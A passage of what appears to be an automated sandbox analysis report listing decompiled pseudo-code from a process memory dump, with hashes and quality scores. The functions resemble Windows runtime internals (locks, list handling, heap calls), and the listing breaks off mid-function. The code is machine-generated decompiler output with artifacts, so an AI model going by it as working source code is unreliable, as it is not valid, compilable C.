                                                    										_t38 = _t90 + 0x14; // 0x0
                                                    										_t39 = _t90 + 0x14; // 0x0
                                                    										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                                                    										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                    											_t85 = _t85 & 0xff000000;
                                                    										}
                                                    										 *(_t90 + 0x14) = _t85;
                                                    									}
                                                    									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                    									 *((intOrPtr*)(_t90 + 8)) = 1;
                                                    									return 0;
                                                    								}
                                                    								_v5 = 1;
                                                    								_t87 = _t74;
                                                    								goto L19;
                                                    							}
                                                    						}
                                                    						_t94 = _t74;
                                                    						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                                    						if(_t74 == 0) {
                                                    							goto L12;
                                                    						} else {
                                                    							_t91 = _t90 + 4;
                                                    							goto L8;
                                                    							L9:
                                                    							while((_t81 & 0x00000001) != 0) {
                                                    								_t69 = _t81;
                                                    								asm("lock cmpxchg [edi], edx");
                                                    								if(_t69 != _t81) {
                                                    									_t81 = _t69;
                                                    									continue;
                                                    								}
                                                    								_t90 = _v16;
                                                    								goto L25;
                                                    							}
                                                    							asm("pause");
                                                    							_t94 = _t94 - 1;
                                                    							if(_t94 != 0) {
                                                    								L8:
                                                    								_t81 =  *_t91;
                                                    								goto L9;
                                                    							} else {
                                                    								_t90 = _v16;
                                                    								_t79 = _v5;
                                                    								goto L12;
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    			}

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                    • Instruction ID: b1c71a5f5e0566eb469345dd3cb1e12bfec2dfa671468e4534f600c30b1b90cc
                                                    • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                    • Instruction Fuzzy Hash: 8A51F030A083499BEB20CF68C0907AEFBB1EF05314F1C81E9DA55972A1D775BA89D741
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 84%
                                                    			E04C1740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                                    				signed short* _v8;
                                                    				intOrPtr _v12;
                                                    				intOrPtr _t55;
                                                    				void* _t56;
                                                    				intOrPtr* _t66;
                                                    				intOrPtr* _t69;
                                                    				void* _t74;
                                                    				intOrPtr* _t78;
                                                    				intOrPtr* _t81;
                                                    				intOrPtr* _t82;
                                                    				intOrPtr _t83;
                                                    				signed short* _t84;
                                                    				intOrPtr _t85;
                                                    				signed int _t87;
                                                    				intOrPtr* _t90;
                                                    				intOrPtr* _t93;
                                                    				intOrPtr* _t94;
                                                    				void* _t98;
                                                    
                                                    				_t84 = __edx;
                                                    				_t80 = __ecx;
                                                    				_push(__ecx);
                                                    				_push(__ecx);
                                                    				_t55 = __ecx;
                                                    				_v8 = __edx;
                                                    				_t87 =  *__edx & 0x0000ffff;
                                                    				_v12 = __ecx;
                                                    				_t3 = _t55 + 0x154; // 0x154
                                                    				_t93 = _t3;
                                                    				_t78 =  *_t93;
                                                    				_t4 = _t87 + 2; // 0x2
                                                    				_t56 = _t4;
                                                    				while(_t78 != _t93) {
                                                    					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                                    						L4:
                                                    						_t78 =  *_t78;
                                                    						continue;
                                                    					} else {
                                                    						_t7 = _t78 + 0x18; // 0x18
                                                    						if(E04B9D4F0(_t7, _t84[2], _t87) == _t87) {
                                                    							_t40 = _t78 + 0xc; // 0xc
                                                    							_t94 = _t40;
                                                    							_t90 =  *_t94;
                                                    							while(_t90 != _t94) {
                                                    								_t41 = _t90 + 8; // 0x8
                                                    								_t74 = E04B8F380(_a4, _t41, 0x10);
                                                    								_t98 = _t98 + 0xc;
                                                    								if(_t74 != 0) {
                                                    									_t90 =  *_t90;
                                                    									continue;
                                                    								}
                                                    								goto L12;
                                                    							}
                                                    							_t82 = L04B64620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                    							if(_t82 != 0) {
                                                    								_t46 = _t78 + 0xc; // 0xc
                                                    								_t69 = _t46;
                                                    								asm("movsd");
                                                    								asm("movsd");
                                                    								asm("movsd");
                                                    								asm("movsd");
                                                    								_t85 =  *_t69;
                                                    								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                    									L20:
                                                    									_t82 = 3;
                                                    									asm("int 0x29");
                                                    								}
                                                    								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                                    								 *_t82 = _t85;
                                                    								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                                    								 *_t69 = _t82;
                                                    								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                                    								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                                    								goto L11;
                                                    							} else {
                                                    								L18:
                                                    								_push(0xe);
                                                    								_pop(0);
                                                    							}
                                                    						} else {
                                                    							_t84 = _v8;
                                                    							_t9 = _t87 + 2; // 0x2
                                                    							_t56 = _t9;
                                                    							goto L4;
                                                    						}
                                                    					}
                                                    					L12:
                                                    					return 0;
                                                    				}
                                                    				_t10 = _t87 + 0x1a; // 0x1a
                                                    				_t78 = L04B64620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                                    				if(_t78 == 0) {
                                                    					goto L18;
                                                    				} else {
                                                    					_t12 = _t87 + 2; // 0x2
                                                    					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                                    					_t16 = _t78 + 0x18; // 0x18
                                                    					E04B8F3E0(_t16, _v8[2], _t87);
                                                    					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                                    					_t19 = _t78 + 0xc; // 0xc
                                                    					_t66 = _t19;
                                                    					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                                    					 *_t66 = _t66;
                                                    					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                                    					_t81 = L04B64620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                    					if(_t81 == 0) {
                                                    						goto L18;
                                                    					} else {
                                                    						_t26 = _t78 + 0xc; // 0xc
                                                    						_t69 = _t26;
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						_t85 =  *_t69;
                                                    						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                    							goto L20;
                                                    						} else {
                                                    							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                                    							 *_t81 = _t85;
                                                    							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                                    							 *_t69 = _t81;
                                                    							_t83 = _v12;
                                                    							 *(_t78 + 8) = 1;
                                                    							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                    							_t34 = _t83 + 0x154; // 0x1ba
                                                    							_t69 = _t34;
                                                    							_t85 =  *_t69;
                                                    							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                    								goto L20;
                                                    							} else {
                                                    								 *_t78 = _t85;
                                                    								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                                    								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                                    								 *_t69 = _t78;
                                                    								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                    							}
                                                    						}
                                                    						goto L11;
                                                    					}
                                                    				}
                                                    				goto L12;
                                                    			}






















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                    • Instruction ID: 9c82f75a027bf6c601e15b57d3a6a7549e2f5af0a58cf583d7a509038f4c300f
                                                    • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                    • Instruction Fuzzy Hash: 0C518D71601606EFDB15CF54C480A56BBB6FF46304F18C0AAE9099F221E371FA46DF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 97%
                                                    			E04B72990() {
                                                    				signed int* _t62;
                                                    				signed int _t64;
                                                    				intOrPtr _t66;
                                                    				signed short* _t69;
                                                    				intOrPtr _t76;
                                                    				signed short* _t79;
                                                    				void* _t81;
                                                    				signed int _t82;
                                                    				signed short* _t83;
                                                    				signed int _t87;
                                                    				intOrPtr _t91;
                                                    				void* _t98;
                                                    				signed int _t99;
                                                    				void* _t101;
                                                    				signed int* _t102;
                                                    				void* _t103;
                                                    				void* _t104;
                                                    				void* _t107;
                                                    
                                                    				_push(0x20);
                                                    				_push(0x4c1ff00);
                                                    				E04B9D08C(_t81, _t98, _t101);
                                                    				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                                                    				_t99 = 0;
                                                    				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                                                    				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                                                    				if(_t82 == 0) {
                                                    					_t62 = 0xc0000100;
                                                    				} else {
                                                    					 *((intOrPtr*)(_t103 - 4)) = 0;
                                                    					_t102 = 0xc0000100;
                                                    					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                                                    					_t64 = 4;
                                                    					while(1) {
                                                    						 *(_t103 - 0x24) = _t64;
                                                    						if(_t64 == 0) {
                                                    							break;
                                                    						}
                                                    						_t87 = _t64 * 0xc;
                                                    						 *(_t103 - 0x2c) = _t87;
                                                    						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x4b21664));
                                                    						if(_t107 <= 0) {
                                                    							if(_t107 == 0) {
                                                    								_t79 = E04B8E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x4b21668)), _t82);
                                                    								_t104 = _t104 + 0xc;
                                                    								__eflags = _t79;
                                                    								if(__eflags == 0) {
                                                    									_t102 = E04BC51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x4b2166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                    									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                                                    									break;
                                                    								} else {
                                                    									_t64 =  *(_t103 - 0x24);
                                                    									goto L5;
                                                    								}
                                                    								goto L13;
                                                    							} else {
                                                    								L5:
                                                    								_t64 = _t64 - 1;
                                                    								continue;
                                                    							}
                                                    						}
                                                    						break;
                                                    					}
                                                    					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                    					__eflags = _t102;
                                                    					if(_t102 < 0) {
                                                    						__eflags = _t102 - 0xc0000100;
                                                    						if(_t102 == 0xc0000100) {
                                                    							_t83 =  *((intOrPtr*)(_t103 + 8));
                                                    							__eflags = _t83;
                                                    							if(_t83 != 0) {
                                                    								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                                                    								__eflags =  *_t83 - _t99;
                                                    								if( *_t83 == _t99) {
                                                    									_t102 = 0xc0000100;
                                                    									goto L19;
                                                    								} else {
                                                    									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                                                    									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                                                    									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                                                    									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                                                    										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                                                    										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                                                    											L26:
                                                    											_t102 = E04B72AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                    											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                    											__eflags = _t102 - 0xc0000100;
                                                    											if(_t102 != 0xc0000100) {
                                                    												goto L12;
                                                    											} else {
                                                    												_t99 = 1;
                                                    												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                                                    												goto L18;
                                                    											}
                                                    										} else {
                                                    											_t69 = E04B56600( *((intOrPtr*)(_t91 + 0x1c)));
                                                    											__eflags = _t69;
                                                    											if(_t69 != 0) {
                                                    												goto L26;
                                                    											} else {
                                                    												_t83 =  *((intOrPtr*)(_t103 + 8));
                                                    												goto L18;
                                                    											}
                                                    										}
                                                    									} else {
                                                    										L18:
                                                    										_t102 = E04B72C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                                                    										L19:
                                                    										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                    										goto L12;
                                                    									}
                                                    								}
                                                    								L28:
                                                    							} else {
                                                    								E04B5EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                    								 *((intOrPtr*)(_t103 - 4)) = 1;
                                                    								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                                                    								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                                                    								_t76 = E04B72AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                                                    								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                                                    								__eflags = _t76 - 0xc0000100;
                                                    								if(_t76 == 0xc0000100) {
                                                    									 *((intOrPtr*)(_t103 - 0x1c)) = E04B72C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                                                    								}
                                                    								 *((intOrPtr*)(_t103 - 4)) = _t99;
                                                    								E04B72ACB();
                                                    							}
                                                    						}
                                                    					}
                                                    					L12:
                                                    					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                                                    					_t62 = _t102;
                                                    				}
                                                    				L13:
                                                    				return E04B9D0D1(_t62);
                                                    				goto L28;
                                                    			}






















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6dfa257426045e9353bcb26231f7fd5f6357afb5d5c203a7a7894e17291dfa7e
                                                    • Instruction ID: 584817bf2c4c1fb4e9c008ccddaabbb6c1b66959ad62f3d02facb934d953df79
                                                    • Opcode Fuzzy Hash: 6dfa257426045e9353bcb26231f7fd5f6357afb5d5c203a7a7894e17291dfa7e
                                                    • Instruction Fuzzy Hash: AA514971A00209AFDF29DF55C940ADEBBB6FF08314F1480E5E825AB260D375A952DB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 78%
                                                    			E04B74D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                    				signed int _v12;
                                                    				char _v176;
                                                    				char _v177;
                                                    				char _v184;
                                                    				intOrPtr _v192;
                                                    				intOrPtr _v196;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed short _t42;
                                                    				char* _t44;
                                                    				intOrPtr _t46;
                                                    				intOrPtr _t50;
                                                    				char* _t57;
                                                    				intOrPtr _t59;
                                                    				intOrPtr _t67;
                                                    				signed int _t69;
                                                    
                                                    				_t64 = __edx;
                                                    				_v12 =  *0x4c3d360 ^ _t69;
                                                    				_t65 = 0xa0;
                                                    				_v196 = __edx;
                                                    				_v177 = 0;
                                                    				_t67 = __ecx;
                                                    				_v192 = __ecx;
                                                    				E04B8FA60( &_v176, 0, 0xa0);
                                                    				_t57 =  &_v176;
                                                    				_t59 = 0xa0;
                                                    				if( *0x4c37bc8 != 0) {
                                                    					L3:
                                                    					while(1) {
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						_t67 = _v192;
                                                    						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                                    						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                                                    						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                                    						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                                    						_push( &_v184);
                                                    						_push(_t59);
                                                    						_push(_t57);
                                                    						_push(0xa0);
                                                    						_push(_t57);
                                                    						_push(0xf);
                                                    						_t42 = E04B8B0B0();
                                                    						if(_t42 != 0xc0000023) {
                                                    							break;
                                                    						}
                                                    						if(_v177 != 0) {
                                                    							L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                    						}
                                                    						_v177 = 1;
                                                    						_t44 = L04B64620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                                    						_t59 = _v184;
                                                    						_t57 = _t44;
                                                    						if(_t57 != 0) {
                                                    							continue;
                                                    						} else {
                                                    							_t42 = 0xc0000017;
                                                    							break;
                                                    						}
                                                    					}
                                                    					if(_t42 != 0) {
                                                    						_t65 = E04B4CCC0(_t42);
                                                    						if(_t65 != 0) {
                                                    							L10:
                                                    							if(_v177 != 0) {
                                                    								if(_t57 != 0) {
                                                    									L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                    								}
                                                    							}
                                                    							_t46 = _t65;
                                                    							L12:
                                                    							return E04B8B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                                    						}
                                                    						L7:
                                                    						_t50 = _a4;
                                                    						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                                    						if(_t50 != 3) {
                                                    							if(_t50 == 2) {
                                                    								goto L8;
                                                    							}
                                                    							L9:
                                                    							if(E04B8F380(_t67 + 0xc, 0x4b25138, 0x10) == 0) {
                                                    								 *0x4c360d8 = _t67;
                                                    							}
                                                    							goto L10;
                                                    						}
                                                    						L8:
                                                    						_t64 = _t57 + 0x28;
                                                    						E04B74F49(_t67, _t57 + 0x28);
                                                    						goto L9;
                                                    					}
                                                    					_t65 = 0;
                                                    					goto L7;
                                                    				}
                                                    				if(E04B74E70(0x4c386b0, 0x4b75690, 0, 0) != 0) {
                                                    					_t46 = E04B4CCC0(_t56);
                                                    					goto L12;
                                                    				} else {
                                                    					_t59 = 0xa0;
                                                    					goto L3;
                                                    				}
                                                    			}





















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7424c2779fe03d89cf71819cf7f464cb6e6d5f2311de875f5e384b4ec71b1433
                                                    • Instruction ID: 0aa2374bd4eec248efaae158e300e6b6e7e61766c464d48865cce405fa5c6250
                                                    • Opcode Fuzzy Hash: 7424c2779fe03d89cf71819cf7f464cb6e6d5f2311de875f5e384b4ec71b1433
                                                    • Instruction Fuzzy Hash: 0841E371A40318AFEB25DF14CD80FAAB7A9EB45724F0044D9E85997280D7B4FD40CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 85%
                                                    			E04B74BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                                                    				signed int _v8;
                                                    				short _v20;
                                                    				intOrPtr _v24;
                                                    				intOrPtr _v28;
                                                    				intOrPtr _v32;
                                                    				char _v36;
                                                    				char _v156;
                                                    				short _v158;
                                                    				intOrPtr _v160;
                                                    				char _v164;
                                                    				intOrPtr _v168;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed int _t45;
                                                    				intOrPtr _t74;
                                                    				signed char _t77;
                                                    				intOrPtr _t84;
                                                    				char* _t85;
                                                    				void* _t86;
                                                    				intOrPtr _t87;
                                                    				signed short _t88;
                                                    				signed int _t89;
                                                    
                                                    				_t83 = __edx;
                                                    				_v8 =  *0x4c3d360 ^ _t89;
                                                    				_t45 = _a8 & 0x0000ffff;
                                                    				_v158 = __edx;
                                                    				_v168 = __ecx;
                                                    				if(_t45 == 0) {
                                                    					L22:
                                                    					_t86 = 6;
                                                    					L12:
                                                    					E04B4CC50(_t86);
                                                    					L11:
                                                    					return E04B8B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                                                    				}
                                                    				_t77 = _a4;
                                                    				if((_t77 & 0x00000001) != 0) {
                                                    					goto L22;
                                                    				}
                                                    				_t8 = _t77 + 0x34; // 0xdce0ba00
                                                    				if(_t45 !=  *_t8) {
                                                    					goto L22;
                                                    				}
                                                    				_t9 = _t77 + 0x24; // 0x4c38504
                                                    				E04B62280(_t9, _t9);
                                                    				_t87 = 0x78;
                                                    				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                                                    				E04B8FA60( &_v156, 0, _t87);
                                                    				_t13 = _t77 + 0x30; // 0x3db8
                                                    				_t85 =  &_v156;
                                                    				_v36 =  *_t13;
                                                    				_v28 = _v168;
                                                    				_v32 = 0;
                                                    				_v24 = 0;
                                                    				_v20 = _v158;
                                                    				_v160 = 0;
                                                    				while(1) {
                                                    					_push( &_v164);
                                                    					_push(_t87);
                                                    					_push(_t85);
                                                    					_push(0x18);
                                                    					_push( &_v36);
                                                    					_push(0x1e);
                                                    					_t88 = E04B8B0B0();
                                                    					if(_t88 != 0xc0000023) {
                                                    						break;
                                                    					}
                                                    					if(_t85 !=  &_v156) {
                                                    						L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                                                    					}
                                                    					_t84 = L04B64620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                                                    					_v168 = _v164;
                                                    					if(_t84 == 0) {
                                                    						_t88 = 0xc0000017;
                                                    						goto L19;
                                                    					} else {
                                                    						_t74 = _v160 + 1;
                                                    						_v160 = _t74;
                                                    						if(_t74 >= 0x10) {
                                                    							L19:
                                                    							_t86 = E04B4CCC0(_t88);
                                                    							if(_t86 != 0) {
                                                    								L8:
                                                    								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                                                    								_t30 = _t77 + 0x24; // 0x4c38504
                                                    								E04B5FFB0(_t77, _t84, _t30);
                                                    								if(_t84 != 0 && _t84 !=  &_v156) {
                                                    									L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                                                    								}
                                                    								if(_t86 != 0) {
                                                    									goto L12;
                                                    								} else {
                                                    									goto L11;
                                                    								}
                                                    							}
                                                    							L6:
                                                    							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                                                    							if(_v164 != 0) {
                                                    								_t83 = _t84;
                                                    								E04B74F49(_t77, _t84);
                                                    							}
                                                    							goto L8;
                                                    						}
                                                    						_t87 = _v168;
                                                    						continue;
                                                    					}
                                                    				}
                                                    				if(_t88 != 0) {
                                                    					goto L19;
                                                    				}
                                                    				goto L6;
                                                    			}

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • Opcode ID: 005ac7cdb3f5df88f8f64af5ce0629a64a55d675d15a81a22627129b70605e5f
                                                    • Instruction ID: b4ce2957c8fbfd533f04e9b54696a26448974f1972a76bfb7200d21444c4abe7
                                                    • Opcode Fuzzy Hash: 005ac7cdb3f5df88f8f64af5ce0629a64a55d675d15a81a22627129b70605e5f
                                                    • Instruction Fuzzy Hash: 6C41A235A002289BDB21DF68C940BEAB7B4EF45710F0105E9ED49AB241DB78FE84CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 94%
                                                    			E04B58A0A(intOrPtr* __ecx, signed int __edx) {
                                                    				signed int _v8;
                                                    				char _v524;
                                                    				signed int _v528;
                                                    				void* _v532;
                                                    				char _v536;
                                                    				char _v540;
                                                    				char _v544;
                                                    				intOrPtr* _v548;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed int _t44;
                                                    				void* _t46;
                                                    				void* _t48;
                                                    				signed int _t53;
                                                    				signed int _t55;
                                                    				intOrPtr* _t62;
                                                    				void* _t63;
                                                    				unsigned int _t75;
                                                    				signed int _t79;
                                                    				unsigned int _t81;
                                                    				unsigned int _t83;
                                                    				signed int _t84;
                                                    				void* _t87;
                                                    
                                                    				_t76 = __edx;
                                                    				_v8 =  *0x4c3d360 ^ _t84;
                                                    				_v536 = 0x200;
                                                    				_t79 = 0;
                                                    				_v548 = __edx;
                                                    				_v544 = 0;
                                                    				_t62 = __ecx;
                                                    				_v540 = 0;
                                                    				_v532 =  &_v524;
                                                    				if(__edx == 0 || __ecx == 0) {
                                                    					L6:
                                                    					return E04B8B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                                                    				} else {
                                                    					_v528 = 0;
                                                    					E04B5E9C0(1, __ecx, 0, 0,  &_v528);
                                                    					_t44 = _v528;
                                                    					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                                                    					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                                                    					_t46 = 0xa;
                                                    					_t87 = _t81 - _t46;
                                                    					if(_t87 > 0 || _t87 == 0) {
                                                    						 *_v548 = 0x4b21180;
                                                    						L5:
                                                    						_t79 = 1;
                                                    						goto L6;
                                                    					} else {
                                                    						_t48 = E04B71DB5(_t62,  &_v532,  &_v536);
                                                    						_t76 = _v528;
                                                    						if(_t48 == 0) {
                                                    							L9:
                                                    							E04B83C2A(_t81, _t76,  &_v544);
                                                    							 *_v548 = _v544;
                                                    							goto L5;
                                                    						}
                                                    						_t62 = _v532;
                                                    						if(_t62 != 0) {
                                                    							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                                                    							_t53 =  *_t62;
                                                    							_v528 = _t53;
                                                    							if(_t53 != 0) {
                                                    								_t63 = _t62 + 4;
                                                    								_t55 = _v528;
                                                    								do {
                                                    									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                                                    										if(E04B58999(_t63,  &_v540) == 0) {
                                                    											_t55 = _v528;
                                                    										} else {
                                                    											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                                                    											_t55 = _v528;
                                                    											if(_t75 >= _t83) {
                                                    												_t83 = _t75;
                                                    											}
                                                    										}
                                                    									}
                                                    									_t63 = _t63 + 0x14;
                                                    									_t55 = _t55 - 1;
                                                    									_v528 = _t55;
                                                    								} while (_t55 != 0);
                                                    								_t62 = _v532;
                                                    							}
                                                    							if(_t62 !=  &_v524) {
                                                    								L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                                                    							}
                                                    							_t76 = _t83 & 0x0000ffff;
                                                    							_t81 = _t83 >> 0x10;
                                                    						}
                                                    						goto L9;
                                                    					}
                                                    				}
                                                    			}

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • Opcode ID: 75fea45aafb0caa876e2fdd547cbfaaf89ecffff8a31f4d3b77431357918ba4d
                                                    • Instruction ID: 8790caabf52d0fd1ed2337fe04c28ec8f1f6c0f0be1f1ea14e07f47a31d5ebef
                                                    • Opcode Fuzzy Hash: 75fea45aafb0caa876e2fdd547cbfaaf89ecffff8a31f4d3b77431357918ba4d
                                                    • Instruction Fuzzy Hash: CF415FB5A002289BDB24EF19C888BA9F3F8EF44300F1045E9DD19D7261E771AE91CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 76%
                                                    			E04C0FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                                                    				char _v8;
                                                    				signed int _v12;
                                                    				signed int _t29;
                                                    				char* _t32;
                                                    				char* _t43;
